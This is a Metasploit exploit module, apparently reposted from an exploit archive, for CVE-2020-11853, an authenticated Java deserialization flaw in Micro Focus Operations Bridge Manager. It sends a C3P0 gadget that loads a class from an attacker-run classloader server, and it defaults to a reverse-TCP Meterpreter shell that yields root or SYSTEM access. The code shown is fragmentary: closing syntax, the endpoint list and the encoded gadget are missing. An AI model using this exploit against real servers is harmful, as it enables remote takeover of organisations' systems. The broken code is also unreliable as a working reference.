Micro Focus Operations Bridge Manager Remote Code Execution Exploit

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Java::HTTP::ClassLoader
  prepend Msf::Exploit::Remote::AutoCheck
  def initialize(info = {})
        'Name' => 'Micro Focus Operations Bridge Manager Authenticated Remote Code Execution',
        'Description' => %q{
          This module exploits an authenticated Java deserialization that affects a truckload of Micro
          Focus products: Operations Bridge Manager, Application Performance Management, Data Center Automation,
          Universal CMDB, Hybrid Cloud Management and Service Management Automation. However this module
          was only tested on Operations Bridge Manager.
          Exploiting this vulnerability will result in remote code execution as the root user on Linux or
          the SYSTEM user on Windows.
          Authentication is required, the module user needs to login to the application and obtain the
          authenticated LWSSO_COOKIE_KEY, which should be fed to the module. Any authenticated user can
          exploit this vulnerability, even the lowest privileged ones.
          For more information refer to the advisory link below.
        'Author' =>
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
        'References' =>
            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
            [ 'CVE', '2020-11853'],
            [ 'ZDI', '20-1327'],
        'DisclosureDate' => '2020-10-28',
        'License' => MSF_LICENSE,
        'Platform' => 'java',
        'Arch' => ARCH_JAVA,
        'Privileged' => true,
        'Targets' => [
          ['Micro Focus Operations Bridge Manager <= 2020.05 (and many other MF products)', {}]
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'java/meterpreter/reverse_tcp'
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
      OptString.new('LWSSO_COOKIE_KEY', [true, 'Authenticated LWSSO_COOKIE_KEY session cookie'])
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/topaz/login.jsp')
    # unfortunately could not find an easy way to detect the version running, even when auth
    if res && res.code == 200 && res.body.include?('Login - Operations Bridge Manager')
      return Exploit::CheckCode::Detected
    return Exploit::CheckCode::Unknown
  def exploit
    # Start our HTTP server to provide remote classloading
    @classloader_uri = start_service
    unless @classloader_uri
      fail_with(Failure::BadConfig, 'Could not start remote classloader server')
    print_good("Started remote classloader server at #{@classloader_uri}")
    # heh, we got two of these, let's pick one randomly!
    vuln_uri = [
    # Send our remote classloader gadget to the target, triggering the vuln
      normalize_uri(target_uri.path, vuln_uri)
  # Convenience method to send our gadget to a URI
  def send_request_gadget(uri)
    print_status("Sending remote classloader gadget to #{full_uri(uri)}")
      'method' => 'POST',
      'uri' => uri,
      'cookie' => "LWSSO_COOKIE_KEY=#{datastore['LWSSO_COOKIE_KEY']}",
      'headers' => { 'Content-Type' => 'application/octet-stream' },
      'data' => go_go_gadget
    }, 0)
  # C3P0 payload generated with a ysoserial jar
  # The ysoserial jar needs to be built with c3p0 version as that is what the target uses
  # See the advisory for details.
  # java -jar ysoserial-0.0.6-SNAPSHOT-all-c3p0- C3P0 'http://whatever/:ExploitClass' | base64
  def go_go_gadget
    gadget = Rex::Text.decode_base64(
    # Replace length-prefixed placeholder strings with our own
    gadget.sub!("\x00\x10http://whatever/", packed_classloader_uri)
    gadget.sub!("\x00\x07exploit", packed_class_name)
    gadget.sub("\x00\x0cExploitClass", packed_class_name)
  # Convenience method to pack the classloader URI as a length-prefixed string
  def packed_classloader_uri
#  0day.today [2021-02-11]  #



